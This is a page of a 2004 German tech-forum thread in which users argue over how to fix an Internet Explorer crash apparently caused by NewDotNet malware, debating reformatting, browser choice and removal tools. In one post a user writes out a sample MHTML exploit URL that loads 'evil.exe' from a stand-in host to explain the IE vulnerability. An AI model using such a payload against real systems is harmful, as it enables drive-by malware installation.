WinFuture-Forum.de: Internet Explorer Stürzt Ab - WinFuture-Forum.de

Zum Inhalt wechseln

Nachrichten zum Thema: Browser & E-Mail
  • 5 Seiten +
  • 1
  • 2
  • 3
  • 4
  • 5

Internet Explorer Stürzt Ab IE stürzt nach etwa 10 - 20 Sekunden ab

#46 _moep_

  • Gruppe: Gäste

geschrieben 06. Dezember 2004 - 18:27

Jo hatte nie 9x also kann ich das nicht beurteilen, ich dachte da leigen Welten dazwischen ist ja auch egal, kannst du die Auflösung so umstellen?
0

Anzeige



#47 Mitglied ist offline   WinlinMax 

  • Gruppe: aktive Mitglieder
  • Beiträge: 588
  • Beigetreten: 14. März 04
  • Reputation: 3
  • Geschlecht:Männlich

geschrieben 06. Dezember 2004 - 18:29

hate noch keine zeit es zu probieren.
sry, mach es später
Häufigster Fehler ist immer noch der DAU
0

#48 Mitglied ist offline   Cirontak 

  • Gruppe: aktive Mitglieder
  • Beiträge: 101
  • Beigetreten: 06. Dezember 04
  • Reputation: 0

geschrieben 07. Dezember 2004 - 10:51

@WinLinMax

Formatieren zu diesem Zeitpunkt ist defintiv nicht angesagt.
1.NewDotNet bietet auf seiner Seite ein Removaltool an, das Du verwenden solltest, da bei Installlation von NewDotNet die Winsock.dll = ein 32-Bit Treiber der Befehle für TCP/IP modifiziert, verändert wurde! Wenn dieser Treiber gecrasht wurde, ist es erst einmal Essig mit dem Internet. ;
2. Die Aussage IE <> andere bessere Browser ist subjektiv. Subjektiv nur aus dem Grunde, dass Surfer im Internet Menschen sind, die auch einmal unaufmerksam klicken- und dies auch bei anderen Browsern. :huh:
3. Eine ordentlich eingerichtete Firewall fängt bzgl. TCP/IP einiges an Unaufmerksamkeit ab. Welche Du nehmen solltest - trotz WinXP -, da enthalte ich mich einer Empfehlung. Schon alleine, um unnötige subjektiv formulierte Posts zu vermeiden. ;D
4. Dann solltest Du einmal die IE-Einstellungen 'Bereich Sicherheit' modifizieren und den Patch zur 128Bit-Verschlüsselungsstärke integrieren.
Also, es gibt viel zu tun - außer dem vielfach empfohlenen Formatieren.

Hier findest Du indirekt eine Erklärung zu dem 'bösen' :) Eintrag mscoree.dll im Hijackthis. ;) Diese Datei hängt auf Deiner Maschine 'in der Luft', da Du sicher nicht .NET Framework installiert hast.
Evtl. solltest Du auch einmal den auf die Betriebssysteme von M$ abgestimmten RegCleaner benutzen, der bei M$ direkt kostenlos als Download angeboten wird!
0

#49 _moep_

  • Gruppe: Gäste

geschrieben 07. Dezember 2004 - 19:10

Zitat

2. Die Aussage IE <> andere bessere Browser ist subjektiv. Subjektiv nur aus dem Grunde, dass Surfer im Internet Menschen sind, die auch einmal unaufmerksam klicken- und dies auch bei anderen Browsern.

1.Nein. Man sollte auf jeden Fall einen anderen Browser nehmen.
Für den IE gibt es so viele Sicherheitslücken, das ist unverantwortlich, wer ihn benutzt gefährdet sich und seine Kommunikationspartner.
Das der Mensch fehler macht weiß jeder, dagegen hilft leider gar nichts (außer Netzstecker) . Aber man kann mit einfachen Mitteln schon viel erreichen.
Ich finde, dass, wenn dies ein DAU oder sonst jemand mit einem geringen Kenntnissen zu diesem Thema, liest, könnte er meinen, dass es egal sei welchen Browser man verwendet, da man sowieso Fehler macht.

2. Zum Thema formatieren: ich denke schon, dass er formatieren sollte, da sich Malware auf seinem Rechner befindet und nur sehr schwer herauszufinden ist, ob sich noch weitere (unbekannte (für den Virenscanner)) Malware auf dem Kompromitierten System befindet. Außerdem sollte sich jeder, dem dies wiederfährt, Gedanken darüber machen, wie es dazu kommen konnte und wie man die Firewall verändert, damit diese Lücke bei nächsten Mal nicht nochmal ausgenutzt werden kann.

Ich bin sehr lehrnfähig, also fallls ich etwas nicht richtig darstelle/verstehe weißt mich ruhig (auch hart) darauf hin.
Der Mensch ist da um zu lernen.
0

#50 Mitglied ist offline   stefanra 

  • Gruppe: aktive Mitglieder
  • Beiträge: 6.208
  • Beigetreten: 13. September 04
  • Reputation: 1

geschrieben 07. Dezember 2004 - 19:35

Zitat

Formatieren zu diesem Zeitpunkt ist defintiv nicht angesagt.

Klar, er kann noch mehrere Stunden mit irgendwelche Virenscannern, oder solchen Programmen, die so tun, als wenn sie was zu Gunsten des Anwenders täten, seinen PC quälen.
Aber, lies dir das mal durch. Dann weiß du, warum wir sagen, dass Formatieren die einzigst _sinnvolle_ Lösung ist.

Zitat

2. Die Aussage IE <> andere bessere Browser ist subjektiv. Subjektiv nur aus dem Grunde, dass Surfer im Internet Menschen sind, die auch einmal unaufmerksam klicken- und dies auch bei anderen Browsern.

Auf jeden Fall, wie moep schon sagte, einen anderen Browser nehmen. Gründe dafür sollte die Boardsuche liefern. ;D
0

#51 Mitglied ist offline   Cirontak 

  • Gruppe: aktive Mitglieder
  • Beiträge: 101
  • Beigetreten: 06. Dezember 04
  • Reputation: 0

geschrieben 07. Dezember 2004 - 20:56

@moep/stefanra
In diese wachsweiche Diskussion - IE-Browser > anderer Browser - und zu den pauschalen Empfehlungen aus dem beigefügten Link werde ich mit absoluter Sicherheit nicht einsteigen. Da ist mir die Zeit zu schade dafür, da es letzten Endes immer subjektiv eingefärbt bleibt. Ich erspare mir deshalb auch Links und Verweise auf Whitepapers zu Sicherheitlückenerklärungen in Linuxoberflächen und Browseroberflächen wie Mozilla, Opera und Firefox in Verbindung mit Javascripts/Javaplug-In. Sogar Google hat erst vor 14 Tagen eine seit 2 Jahren bekannte Sicherheitslückke versucht zu schließen. Rückmeldungen über Erfolg fanden noch nicht den Weg ins Netz. :D
Alles klar ?
Diese verunsichernde Aussage mit dem Titel - kompromittiertes System - ist und bleibt eine Dauerbaustelle, so lange es User gibt, die schlicht und ergreifend bestehende Sicherheitsstrukturen übersehen oder auch ignorieren.
Hier ist ein Member, der Hilfe erwartet und nicht gebetsmühlenhafte Aussagen.

Hättet ihr beide die Ziffer 1 aus meinem Post und die Hinweise zu mscoree.dll richtig verstanden und dazu evtl. zusätzliche Hinweise gegeben, wäre dem anfragenden Member mehr geholfen.
0

#52 _moep_

  • Gruppe: Gäste

geschrieben 07. Dezember 2004 - 21:08

Das versteh ich nicht (tut mir leid ich hasse arrogante Leute) du bist dir zu Schade dein Wissen zu erweitern oder zu schauen ob es da noch etwas zu verbessern gibt?
Ne versteh ich nicht.
Wie gesagt jedes Programm hat Sicherheitslücken, der IE zu viel um ihn benutzen zu können. Also solltest du ihn nicht mit anderen gleich stellen oder auch nur in Erwägung ziehen. Du kennst dich vielleicht gut aus viele andere Leider nicht, meiner Meinung ist es gefährlich den IE zu nutzen im Verhältnis einen anderen Browser wie Firefox zu nutzen.

Zitat

Diese verunsichernde Aussage mit dem Titel - kompromittiertes System - ist und bleibt eine Dauerbaustelle, so lange es User gibt, die schlicht und ergreifend bestehende Sicherheitsstrukturen übersehen oder auch ignorieren.
Hier ist ein Member, der Hilfe erwartet und nicht gebetsmühlenhafte Aussagen.

Ja und genau da versuchen wir zu helfen. Gebetsmühlenhafte Aussagen? Meinst du das er formatieren soll? Das ist nun mal der sicherste Weg.

Die Ziffer 1 verweist auf ein Removal Tool. Hilft aber nicht gegen Firewalllücken.

So vielleicht verstehe ich das falsch was du sagst ich halte es für gefährlich IE mit anderen gleich zu stellen, aus benannten Gründen.

Wie gesagt ist nur meine Meinung ich möchte niemanden beleidigen oder angreifen.
0

#53 Mitglied ist offline   Cirontak 

  • Gruppe: aktive Mitglieder
  • Beiträge: 101
  • Beigetreten: 06. Dezember 04
  • Reputation: 0

geschrieben 07. Dezember 2004 - 21:40

@Moep

Zitat

Die Ziffer 1 verweist auf ein Removal Tool. Hilft aber nicht gegen Firewalllücken


Genau dieser Satz zeigt, dass Du den Link nicht geöffnet hast und mit der Bezeichnung Removal Tool nichts anfangen kannst.

Also bitte, erst informieren und erfahren, dass NewDotNet mit dem letzten Satz auf dieser Linkseite ein UninstallProgramm mit gut formulierter Nutzungsanweisung zur Entfernung der von Dir bezeichneten Malware zur Verfügung stellt!
0

#54 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 07. Dezember 2004 - 21:43

NewDotnet installiert sich aber über eine bekannte Lücke im IE, die zu diesem Zeitpunkt nicht geschlossen war. Was also nützt dir das Removal-Tool gegen die andere Malware, die über die gleiche Lücke reingekommen sein kann?

Vor allem: Wer garabntiert dir, daß das Removal-Tool auch diese Version von NewDotnet aktuell ist? Der nette freundliche Anbieter dieser Malware?
Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#55 Mitglied ist offline   Cirontak 

  • Gruppe: aktive Mitglieder
  • Beiträge: 101
  • Beigetreten: 06. Dezember 04
  • Reputation: 0

geschrieben 07. Dezember 2004 - 22:07

@Rika
Welche bekannte Lücke? Da bin ich jetzt aber auf eine profunde Antwort gespannt.

Edit: Bedenke bei Deiner Rückantwort, dass es für künftige Malware auf keinem System, welcher Sicherheitsstatus auch immer vorliegt, keine 100 %-ige Sicherheit geben wird.

Dieser Beitrag wurde von Cirontak bearbeitet: 07. Dezember 2004 - 22:19

0

#56 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 07. Dezember 2004 - 22:14

Die MHTML-Lücke.

mhtml://http://istmiregal.was/ich/hier/angebe.mht!http://www.evilserver.com/malware.chm::evil.exe

Dieser Beitrag wurde von Rika bearbeitet: 07. Dezember 2004 - 22:45

Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#57 Mitglied ist offline   Cirontak 

  • Gruppe: aktive Mitglieder
  • Beiträge: 101
  • Beigetreten: 06. Dezember 04
  • Reputation: 0

geschrieben 07. Dezember 2004 - 22:34

@Rika
Auch Dir muss ich sagen. Erst informieren und dann posten.:D
MHTML = Schnee vom April 2004! und betraf OutlookExpress!!
0

#58 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 07. Dezember 2004 - 22:48

1. Die Lücke war auch im IE. Siehe http://www.safecente...4/ie_unpatched/
2. Und eben weil sie ja eigentlich schon längst gepatcht sein sollte hat der OP Mist gebaut.
Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#59 Mitglied ist offline   Cirontak 

  • Gruppe: aktive Mitglieder
  • Beiträge: 101
  • Beigetreten: 06. Dezember 04
  • Reputation: 0

geschrieben 07. Dezember 2004 - 23:16

@Rika
Linkseite mit einem Updatedatum 2004/01/27. Schnee von gestern! :D

Wenn schon Sicherheitsinformationen - klar definiert und für jeden Laien nachvollziehbar - dann bitte mit Fakten
und verständlicher Hilfe und nicht mit Code-Zeilen.
0

#60 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 08. Dezember 2004 - 01:05

:D Die Lücke existierte zu diesem Zeitpunkt und wenn kein Patch dafür eingespielt wurde dann existiert sie auf dem System des OP noch heute. Zumindest hat sie an dem Zeitpunkt, wo sich NetDotNet installierte, noch existiert. Wo ist dein Problem, verdammt?

Was der Laie mit Proxomitron anfangen soll oder was bei Guru's Heaven für Bullshit steht lasse ich jetzt mal noch außen vor...

Dieser Beitrag wurde von Rika bearbeitet: 08. Dezember 2004 - 19:08

Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

Thema verteilen:


  • 5 Seiten +
  • 1
  • 2
  • 3
  • 4
  • 5

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0